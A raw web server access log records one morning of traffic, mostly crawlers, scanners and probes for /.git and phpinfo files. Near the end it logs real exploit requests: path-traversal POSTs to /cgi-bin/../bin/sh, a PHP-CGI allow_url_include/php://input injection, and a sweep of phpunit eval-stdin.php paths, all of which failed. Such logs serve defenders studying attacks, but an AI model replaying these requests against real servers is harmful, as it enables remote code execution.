195.211.191.127 - - [10/Apr/2025:04:51:00 +0200] "GET /.git/config HTTP/1.1" 404 285 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36"
154.81.156.34 - - [10/Apr/2025:04:53:20 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
151.106.168.134 - - [10/Apr/2025:04:56:53 +0200] "GET /cron.php?cron_type=tidy_cache&sid=7c8d5469e1027a00a599292e8e5ce2f3 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.168.134 - - [10/Apr/2025:04:56:53 +0200] "GET /cron.php?cron_type=tidy_cache&sid=7c8d5469e1027a00a599292e8e5ce2f3 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.168.134 - - [10/Apr/2025:04:56:54 +0200] "GET /cron.php?cron_type=tidy_cache&sid=7c8d5469e1027a00a599292e8e5ce2f3 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.191.138 - - [10/Apr/2025:04:57:31 +0200] "GET /download/file.php?id=252&sid=192396fa1e68a1c0abae95febd6fc570 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.191.138 - - [10/Apr/2025:04:57:31 +0200] "GET /download/file.php?id=252&sid=192396fa1e68a1c0abae95febd6fc570 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.191.138 - - [10/Apr/2025:04:57:32 +0200] "GET /download/file.php?id=252&sid=192396fa1e68a1c0abae95febd6fc570 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
154.81.156.54 - - [10/Apr/2025:04:57:54 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
154.81.156.54 - - [10/Apr/2025:05:02:27 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.136 - - [10/Apr/2025:05:06:24 +0200] "GET /renault.2web.at/htdocs/binaries/10231944.pdf HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
71.238.140.129 - - [10/Apr/2025:05:07:28 +0200] "GET / HTTP/1.0" 200 423 "-" "curl/7.88.1"
156.59.198.136 - - [10/Apr/2025:05:08:04 +0200] "GET /docs/contadino/2018/RECHNUNG/RE18-00019.pdf HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
157.245.233.24 - - [10/Apr/2025:05:08:11 +0200] "GET / HTTP/1.1" 200 274 "-" "python-requests/2.32.3"
157.230.3.126 - - [10/Apr/2025:05:08:14 +0200] "GET / HTTP/1.1" 200 274 "-" "python-requests/2.32.3"
157.245.233.24 - - [10/Apr/2025:05:08:19 +0200] "GET / HTTP/1.1" 200 274 "-" "python-requests/2.32.3"
156.59.198.136 - - [10/Apr/2025:05:09:49 +0200] "GET /docs/contadino/2017/GS17-000006.pdf HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [10/Apr/2025:05:17:25 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12467000.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [10/Apr/2025:05:20:51 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12414365.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
154.81.156.54 - - [10/Apr/2025:05:23:14 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
35.203.210.5 - - [10/Apr/2025:05:23:23 +0200] "GET / HTTP/1.1" 200 274 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
151.106.183.52 - - [10/Apr/2025:05:38:08 +0200] "GET /cron.php?cron_type=tidy_cache&sid=8c77e9a8f2ab2cc1834857dee98702e5 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.183.52 - - [10/Apr/2025:05:38:08 +0200] "GET /cron.php?cron_type=tidy_cache&sid=8c77e9a8f2ab2cc1834857dee98702e5 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.183.52 - - [10/Apr/2025:05:38:08 +0200] "GET /cron.php?cron_type=tidy_cache&sid=8c77e9a8f2ab2cc1834857dee98702e5 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.184.192 - - [10/Apr/2025:05:42:06 +0200] "GET /download/file.php?id=252&sid=7b7ab058d79a8bd192b7c6aa12dddc8a HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.184.192 - - [10/Apr/2025:05:42:07 +0200] "GET /download/file.php?id=252&sid=7b7ab058d79a8bd192b7c6aa12dddc8a HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.184.192 - - [10/Apr/2025:05:42:07 +0200] "GET /download/file.php?id=252&sid=7b7ab058d79a8bd192b7c6aa12dddc8a HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
184.105.139.70 - - [10/Apr/2025:05:43:15 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0"
151.106.176.244 - - [10/Apr/2025:05:44:25 +0200] "GET /download/file.php?id=251&sid=4a1f25e3e84ec6c467e97d52dc30ef97 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.176.244 - - [10/Apr/2025:05:44:26 +0200] "GET /download/file.php?id=251&sid=4a1f25e3e84ec6c467e97d52dc30ef97 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.176.244 - - [10/Apr/2025:05:44:26 +0200] "GET /download/file.php?id=251&sid=4a1f25e3e84ec6c467e97d52dc30ef97 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
154.81.156.35 - - [10/Apr/2025:05:46:06 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
184.105.139.70 - - [10/Apr/2025:05:46:37 +0200] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
184.105.139.70 - - [10/Apr/2025:05:47:24 +0200] "GET /geoserver/web/ HTTP/1.1" 404 284 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0"
184.105.139.70 - - [10/Apr/2025:05:47:58 +0200] "GET /info.php HTTP/1.1" 404 283 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0"
184.105.139.70 - - [10/Apr/2025:05:48:01 +0200] "GET /phpinfo.php HTTP/1.1" 200 10184 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0"
184.105.139.70 - - [10/Apr/2025:05:48:03 +0200] "GET /dashboard/phpinfo.php HTTP/1.1" 404 290 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Edg/125.0.0.0"
154.81.156.54 - - [10/Apr/2025:05:53:14 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
151.106.165.0 - - [10/Apr/2025:06:02:59 +0200] "GET /download/file.php?id=252&sid=c69a839e44c3409b71c45267b15d78ed HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.165.0 - - [10/Apr/2025:06:02:59 +0200] "GET /download/file.php?id=252&sid=c69a839e44c3409b71c45267b15d78ed HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.165.0 - - [10/Apr/2025:06:03:00 +0200] "GET /download/file.php?id=252&sid=c69a839e44c3409b71c45267b15d78ed HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
154.81.156.54 - - [10/Apr/2025:06:03:53 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
154.81.156.10 - - [10/Apr/2025:06:04:14 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.136 - - [10/Apr/2025:06:05:42 +0200] "GET /docs/ecommlogistics/belege/RE2016.PDF HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [10/Apr/2025:06:09:31 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11504647.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
151.106.180.26 - - [10/Apr/2025:06:17:17 +0200] "GET /cron.php?cron_type=tidy_cache&sid=6df6ff35f9abea5790bb8385b0bde5e5 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.180.26 - - [10/Apr/2025:06:17:17 +0200] "GET /cron.php?cron_type=tidy_cache&sid=6df6ff35f9abea5790bb8385b0bde5e5 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.180.26 - - [10/Apr/2025:06:17:18 +0200] "GET /cron.php?cron_type=tidy_cache&sid=6df6ff35f9abea5790bb8385b0bde5e5 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
154.81.156.34 - - [10/Apr/2025:06:24:54 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.135 - - [10/Apr/2025:06:26:22 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11054455.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
154.81.156.54 - - [10/Apr/2025:06:29:50 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
151.106.184.192 - - [10/Apr/2025:06:30:03 +0200] "GET /download/file.php?id=255&sid=e71b571cd907b1cebc6db341ce45ea5c HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.184.192 - - [10/Apr/2025:06:30:03 +0200] "GET /download/file.php?id=255&sid=e71b571cd907b1cebc6db341ce45ea5c HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.184.192 - - [10/Apr/2025:06:30:04 +0200] "GET /download/file.php?id=255&sid=e71b571cd907b1cebc6db341ce45ea5c HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
114.119.129.179 - - [10/Apr/2025:06:31:43 +0200] "GET /robots.txt HTTP/1.1" 404 291 "-" "Mozilla/5.0 (compatible;PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
196.251.70.87 - - [10/Apr/2025:06:33:39 +0200] "GET /.git/refs/ HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3881.0 Safari/537.36"
206.168.34.115 - - [10/Apr/2025:06:41:47 +0200] "\x16\x03\x01" 400 383 "-" "-"
206.168.34.115 - - [10/Apr/2025:06:41:56 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
206.168.34.115 - - [10/Apr/2025:06:42:00 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
206.168.34.115 - - [10/Apr/2025:06:42:06 +0200] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
206.168.34.115 - - [10/Apr/2025:06:42:09 +0200] "PRI * HTTP/2.0" 400 383 "-" "-"
206.168.34.115 - - [10/Apr/2025:06:42:17 +0200] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
206.168.34.115 - - [10/Apr/2025:06:42:24 +0200] "\x16\x03\x01" 400 383 "-" "-"
156.59.198.135 - - [10/Apr/2025:06:42:30 +0200] "GET /renault.2web.at/htdocs/binaries/renault-/stellwaende03280x150finalpdf.pdf HTTP/1.0" 404 324 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
20.127.159.34 - - [10/Apr/2025:06:46:34 +0200] "GET /ReportServer HTTP/1.1" 404 282 "-" "Mozilla/5.0 zgrab/0.x"
154.81.156.54 - - [10/Apr/2025:06:46:43 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.136 - - [10/Apr/2025:06:46:52 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11228920.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
151.106.169.235 - - [10/Apr/2025:06:54:06 +0200] "GET /cron.php?cron_type=tidy_warnings&sid=cf40d33fdbca252f28130397dadafa2a HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.169.235 - - [10/Apr/2025:06:54:06 +0200] "GET /cron.php?cron_type=tidy_warnings&sid=cf40d33fdbca252f28130397dadafa2a HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.169.235 - - [10/Apr/2025:06:54:06 +0200] "GET /cron.php?cron_type=tidy_warnings&sid=cf40d33fdbca252f28130397dadafa2a HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
156.59.198.135 - - [10/Apr/2025:06:55:17 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11757929.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
167.94.145.107 - - [10/Apr/2025:06:56:14 +0200] "GET / HTTP/1.1" 200 423 "-" "-"
167.94.145.107 - - [10/Apr/2025:06:56:18 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.145.107 - - [10/Apr/2025:06:56:18 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.145.107 - - [10/Apr/2025:06:56:18 +0200] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.145.107 - - [10/Apr/2025:06:56:18 +0200] "PRI * HTTP/2.0" 400 383 "-" "-"
167.94.145.107 - - [10/Apr/2025:06:56:27 +0200] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.145.107 - - [10/Apr/2025:06:56:27 +0200] "\x16\x03\x01" 400 383 "-" "-"
162.62.213.187 - - [10/Apr/2025:06:57:40 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
154.81.156.35 - - [10/Apr/2025:07:00:25 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
147.185.132.30 - - [10/Apr/2025:07:03:02 +0200] "GET / HTTP/1.0" 200 423 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
156.59.198.136 - - [10/Apr/2025:07:06:24 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10396601.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [10/Apr/2025:07:10:17 +0200] "GET /renault.2web.at/htdocs/binaries/10004867.pdf HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
151.106.186.76 - - [10/Apr/2025:07:10:28 +0200] "GET /gallery/image.php?mode=medium&album_id=1&image_id=115&sid=071ae5b1b886530160fa3dbf77b735c4 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.186.76 - - [10/Apr/2025:07:10:28 +0200] "GET /gallery/image.php?mode=medium&album_id=1&image_id=115&sid=071ae5b1b886530160fa3dbf77b735c4 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.186.76 - - [10/Apr/2025:07:10:29 +0200] "GET /gallery/image.php?mode=medium&album_id=1&image_id=115&sid=071ae5b1b886530160fa3dbf77b735c4 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
31.162.246.178 - - [10/Apr/2025:07:10:33 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
66.9.184.129 - - [10/Apr/2025:07:15:18 +0200] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 373 "-" "Custom-AsyncHttpClient"
66.9.184.129 - - [10/Apr/2025:07:15:21 +0200] "POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1" 400 373 "-" "Custom-AsyncHttpClient"
66.9.184.129 - - [10/Apr/2025:07:15:22 +0200] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 373 "-" "Custom-AsyncHttpClient"
66.9.184.129 - - [10/Apr/2025:07:15:26 +0200] "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 404 356 "-" "Custom-AsyncHttpClient"
66.9.184.129 - - [10/Apr/2025:07:15:31 +0200] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 395 "-" "Custom-AsyncHttpClient"
66.9.184.129 - - [10/Apr/2025:07:15:32 +0200] "POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1" 400 373 "-" "Custom-AsyncHttpClient"
66.9.184.129 - - [10/Apr/2025:07:15:36 +0200] "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 391 "-" "Custom-AsyncHttpClient"
66.9.184.129 - - [10/Apr/2025:07:15:37 +0200] "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 404 356 "-" "Custom-AsyncHttpClient"
66.9.184.129 - - [10/Apr/2025:07:15:39 +0200] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 395 "-" "Custom-AsyncHttpClient"
66.9.184.129 - - [10/Apr/2025:07:15:40 +0200] "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 387 "-" "Custom-AsyncHttpClient"
66.9.184.129 - - [10/Apr/2025:07:15:49 +0200] "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 383 "-" "Custom-AsyncHttpClient"
66.9.184.129 - - [10/Apr/2025:07:15:54 +0200] "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 391 "-" "Custom-AsyncHttpClient"
5.183.209.244 - - [10/Apr/2025:07:16:00 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
66.9.184.129 - - [10/Apr/2025:07:16:01 +0200] "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 387 "-" "Custom-AsyncHttpClient"
66.9.184.129 - - [10/Apr/2025:07:16:07 +0200] "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 383 "-" "Custom-AsyncHttpClient"
66.9.184.129 - - [10/Apr/2025:07:16:18 +0200] "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1" 404 390 "-" "Custom-AsyncHttpClient"
66.9.184.129 - - [10/Apr/2025:07:16:36 +0200] "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 402 "-" "Custom-AsyncHttpClient"
66.9.184.129 - - [10/Apr/2025:07:17:50 +0200] "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 388 "-" "Custom-AsyncHttpClient"
66.9.184.129 - - [10/Apr/2025:07:17:56 +0200] "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 384 "-" "Custom-AsyncHttpClient"
66.9.184.129 - - [10/Apr/2025:07:18:08 +0200] "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 380 "-" "Custom-AsyncHttpClient"
66.9.184.129 - - [10/Apr/2025:07:18:21 +0200] "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 376 "-" "Custom-AsyncHttpClient"
66.9.184.129 - - [10/Apr/2025:07:18:34 +0200] "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 392 "-" "Custom-AsyncHttpClient"
66.9.184.129 - - [10/Apr/2025:07:18:44 +0200] "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 388 "-" "Custom-AsyncHttpClient"
66.9.184.129 - - [10/Apr/2025:07:18:48 +0200] "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 384 "-" "Custom-AsyncHttpClient"
66.9.184.129 - - [10/Apr/2025:07:18:52 +0200] "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 380 "-" "Custom-AsyncHttpClient"
66.9.184.129 - - [10/Apr/2025:07:19:01 +0200] "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 399 "-" "Custom-AsyncHttpClient"
66.9.184.129 - - [10/Apr/2025:07:19:09 +0200] "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 403 "-" "Custom-AsyncHttpClient"
66.9.184.129 - - [10/Apr/2025:07:19:32 +0200] "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 399 "-" "Custom-AsyncHttpClient"
66.9.184.129 - - [10/Apr/2025:07:19:39 +0200] "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 398 "-" "Custom-AsyncHttpClient"
151.106.169.235 - - [10/Apr/2025:07:19:42 +0200] "GET /cron.php?cron_type=tidy_cache&sid=d4b6a05e546ee5e9172ab3adb94b5c5b HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.169.235 - - [10/Apr/2025:07:19:42 +0200] "GET /cron.php?cron_type=tidy_cache&sid=d4b6a05e546ee5e9172ab3adb94b5c5b HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.169.235 - - [10/Apr/2025:07:19:43 +0200] "GET /cron.php?cron_type=tidy_cache&sid=d4b6a05e546ee5e9172ab3adb94b5c5b HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
66.9.184.129 - - [10/Apr/2025:07:19:44 +0200] "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 399 "-" "Custom-AsyncHttpClient"
66.9.184.129 - - [10/Apr/2025:07:19:50 +0200] "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 400 "-" "Custom-AsyncHttpClient"
